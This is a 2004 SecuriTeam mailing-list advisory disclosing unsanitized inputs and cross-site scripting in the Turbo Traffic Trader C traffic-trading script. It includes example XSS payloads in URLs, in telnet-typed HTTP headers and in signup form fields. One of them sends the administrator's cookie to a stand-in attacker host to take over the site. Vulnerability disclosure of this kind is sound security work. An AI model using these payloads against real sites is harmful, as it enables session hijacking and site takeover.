[UNIX] TTT-C Multiple Cross-Site Scripting

From: SecuriTeam (support_at_securiteam.com)
Date: 05/18/04

  • Next message: SecuriTeam: "[UNIX] Wget Race Condition Vulnerability Allows a Symlink Attack" 
    To: list@securiteam.com
Date: 18 May 2004 18:28:05 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      TTT-C Multiple Cross-Site Scripting
    ------------------------------------------------------------------------

    SUMMARY

    "The World's Most Advanced Free C Traffic Trading Script.
    <http://www.turbotraffictrader.com/> Turbo Traffic Trader C 1.0 is an
    advanced trading script written entirely in C/Sqlite, it offers you
    advanced features that cannot be found in other FREE scripts."

    TTT-C does not sanitize variables. This leads to very easy XSS scripting
    and in some cases complete site traffic hijacking.

    DETAILS

    Vulnerable Systems:
     * Latest stable release, all betas and release candidates (RC)

    In TTT-C, no input variables are sanitized whatsoever, making it easy to
    insert HTML code inside the administrative interface. On sites with trade
    signup enabled it is also possible to hijack the admin interface and the
    administrator's cookie that could allow the attacker to take over the
    system. In addition, an attacker would be able to steal all traffic the
    site has.

    Some examples of XSS bugs in the 'Links' panel are provided:
    http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20%3Cscr!pt%3Ealert('from_browser_insert');%3C/scr!pt%3E
    http://www.vulnerable.com/cgi-bin/ttt-out?link=testing%20>alert('from_browser_insert');</scr!pt>

    An example analysis of the IP Logs panel reveals that the IP address can
    be null, some XSS code, and the 'proxy' variable is un-sanitized, etc.
    Example of the XSS in the 'proxy' variable:
    telnet www.vulnerable.com 80
    Trying www.vulnerable.com...
    Connected to www.vulnerable.com.
    Escape character is '^]'.
    GET /cgi-bin/ttt-in HTTP/1.1
    X-Forwarded-For: 192.168.0.1<scr!pt>alert('proxy_insert');</scr!pt>
    Host: www.vulnerable.com

    An example for the IP variable is given but in order to use it local
    access is required:
    export REMOTE_ADDR="127.0.0.1<scr!pt>alert('ip_inject');</scr!pt>"
    /ttt-in will load one bad record for IP

    For the Referer Logs panel, the following is a similar example to that of
    the IP:
    telnet www.vulnerable.com 80
    Trying www.vulnerable.com...
    Connected to www.vulnerable.com.
    Escape character is '^]'.
    GET /cgi-bin/ttt-in HTTP/1.1
    X-Forwarded-For: 192.168.0.6<scr!pt>alert('proxy_insert');</scr!pt>
    Referer:
    http://www.referrer.com"<scr!pt>alert('referrer_inject');</scr!pt>"
    Host: www.vulnerable.com

    For the 'Edit' and 'Main' control panels, the following example will
    result in a complete takeover. However, you must signup for a trade in
    order to perform it (signing up with a bogus site information is
    possible):
    Site Name =
    http://www.owned.com"<scr!pt>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook=' cook '';</scr!pt>
    Site URL =
    http://www.owned.com"<scr!pt>cook=document.cookie;window.location='http://www.hacker.com/steal-admin-cookie.php?cook=' cook '';</scr!pt>
    Webmaster e-mail =
    email@something.com"<scr!pt>alert('email_inject');</scr!pt>
    Webmaster ICQ = 123456"<scr!pt>alert('ICQ_inject');</scr!pt>

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:spam@icefire.org> Kaloyan
    Georgiev (ICEFIRE).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Wget Race Condition Vulnerability Allows a Symlink Attack"

    Relevant Pages

    • [NEWS] Google.com UTF-7 XSS Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Google.com UTF-7 XSS Vulnerabilities ... The server response lacks charset encoding enforcement, ...
      (Securiteam)
    • [REVS] DOM Based Cross Site Scripting
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... We all know what Cross Site Scripting (XSS) is, ... vulnerability wherein one sends malicious data (typically HTML stuff with ... But there s also a third kind of XSS attacks - the ones that do not rely ...
      (Securiteam)
    • [UNIX] B-net Software Multiple XSS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... B-net Software Multiple XSS ...
      (Securiteam)